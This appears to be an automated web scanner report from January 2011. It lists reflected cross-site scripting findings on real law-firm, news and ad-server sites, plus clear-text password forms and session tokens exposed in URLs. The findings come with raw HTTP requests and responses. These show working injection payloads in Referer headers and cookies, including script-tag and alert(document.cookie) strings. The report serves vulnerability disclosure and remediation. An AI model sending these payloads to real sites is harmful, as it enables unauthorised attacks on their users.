Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /publications.cfm?id=2795&action=view HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=1e6ed"><a>0d08c6799e
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Trade mark owner can object to resale of 'perfume te ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=1e6ed"><a>0d08c6799e"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c070"><a>4421a84236f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /remote_access.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=6c070"><a>4421a84236f
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: OFFICE=;path=/
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 997bb"><a>c1452cc4d4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /search.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=997bb"><a>c1452cc4d4
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91afd"><a>22110ca1882 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /sitemap.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=91afd"><a>22110ca1882
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605f4"><a>5f16750633f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Referer: http://www.google.com/search?hl=en&q=605f4"><a>5f16750633f
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:50:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A01%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D780%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:01 GMT;path=/
Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d539"-alert(1)-"d98fb76f347 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: www.kasimer-ittig.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5d539"-alert(1)-"d98fb76f347
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11e39"-alert(1)-"c7efa5beb18 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~01041111e39"-alert(1)-"c7efa5beb18; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1
Response (redirected)
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1479B1099,2#668902|0,1,1;expires=Fri, 18 Feb 2011 18:01:17 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=509
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:01:17 GMT
Connection: close
Content-Length: 2115
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='';var zzCusto ...[SNIP]... d='INmz6woBADYAAHrQ5V4AAACH~01041111e39"-alert(1)-"c7efa5beb18';
var zzhasAd=undefined;
var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~01041111e39"-alert(1)-"c7efa5beb18;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b03b"-alert(1)-"d9b6e79ead6 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104112b03b"-alert(1)-"d9b6e79ead6; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:01:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=526
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:01:00 GMT
Connection: close
Content-Length: 2035
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='';var zzCusto ...[SNIP]... zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104112b03b"-alert(1)-"d9b6e79ead6';
var zzhasAd=undefined;
var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~0104112b03b"-alert(1)-"d9b6e79ead6;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the ltcid cookie is copied into the HTML document as plain text between tags. The payload 4bf45<script>alert(1)</script>08862fae6c1 was submitted in the ltcid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1 Host: lt.navegg.com Proxy-Connection: keep-alive Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ltcid=5473625974bf45<script>alert(1)</script>08862fae6c1
Response
HTTP/1.1 200 OK P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 20-Jan-2011 06:01:20 GMT Content-type: application/javascript Date: Wed, 19 Jan 2011 18:01:20 GMT Server: lighttpd/1.4.19 Content-Length: 84
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://dcregistry.com/cgi-bin/wbn2/wbn_admin.pl
The form contains the following password field:
password
Request
GET /wbn/welcome.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:20:53 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 49869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://dcregistry.com/cgi-bin/wbn/wbn_admin.pl
The form contains the following password field:
password
Request
GET /wbn/welcome.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:20:53 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 49869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start reset password --> <form id="cnnConnectFormReset" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input type="password" id="new_password" name="newPassword"> <div id="cnnConnectResetErrors"> ...[SNIP]...
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start login --> <form onsubmit="return false;" id="cnnMoneyConnectFormLogin" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input class="" id="passwordinput" name="password" type="password"> <div id="cnnConnectLoginErrors" style="display: none;"> ...[SNIP]...
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start registration --> <form onsubmit="return false;" id="cnnConnectFormRegister" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input id="signup_password" name="password" maxlength="10" type="password" /> <span class="fieldTip"> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.local.com/results.aspx
The form contains the following password field:
password
Request
GET /results.aspx HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.political.cov.com/login.cfm
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.political.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 16:55:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /alumni/Index.cfm HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]... <td align="left" valign="top"> <form method="post" action="alumni_authenticate.cfm" id="loginFrm">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date ...[SNIP]... </div>
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.vault.com/wps/portal/usa/membership
The form contains the following password fields:
UserPassword
UserConfirm
Request
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /about_the_firm_recognition_rankings.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
